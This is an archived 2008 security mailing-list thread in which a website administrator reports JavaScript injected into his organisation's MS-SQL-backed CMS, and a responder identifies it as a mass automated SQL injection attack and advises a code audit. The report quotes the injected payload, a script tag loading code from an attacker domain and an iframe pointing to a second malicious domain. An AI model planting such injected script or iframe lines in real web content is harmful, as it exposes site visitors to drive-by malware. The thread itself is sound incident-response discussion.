Re: Mysterious JavaScript appearance in website database

[Jon Oberheide <jon () oberheide org>]

Looks like an SQL injection attack.

Take a look in your MS-SQL database at the affected entries and I bet
you'll see the nmidahena reference.

Since this is a widespread, automated attack that has affected other
sites, it's unlikely it was targeted at your specific organization or
custom CMS.  Give your codebase a thorough audit for SQL injection
vectors.

Regards,
Jon Oberheide

On Mon, 2008-04-14 at 16:03 -0700, Glenn Gillis wrote:
> On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the
> U.S.-based NGO I work for mysteriously had a JavaScript URL appended to 
> the titles of much of the content on our website:
>
>    <script src=http://www.nihaorr1.com/1.js></script>
>
> NB: the last modified dates for all of the content containing a 
> reference to this script are identical, right down the 1/100 second.
>
> The contents of the script apparently attempts to open an iframe to a
> non-existent domain, "nmidahena.com":
>
>    document.writeln("<iframe width=\'10\' height=\'1\'
> src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>");
>
> I haven't found any reports of a new worm, etc. that might account for 
> this, but when I Google "nmidahena.com" I get over 100,000 hits for
> other sites on which this script is present.
>
> We are running a custom-developed CMS with MS-SQL Server 2000 as the 
> backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The NT 
> Server is fully patched with whatever OS, IIS and SQL Server 2K hotfixes 
> released prior to NT4's end-of-life declaration by MS, for what it's worth.)
>
> Anyone have an idea what might have caused this?
-- 
Jon Oberheide <jon () oberheide org>
GnuPG Key: 1024D/F47C17FE
Fingerprint: B716 DA66 8173 6EDD 28F6  F184 5842 1C89 F47C 17FE

Attachment: signature.asc
Description: This is a digitally signed message part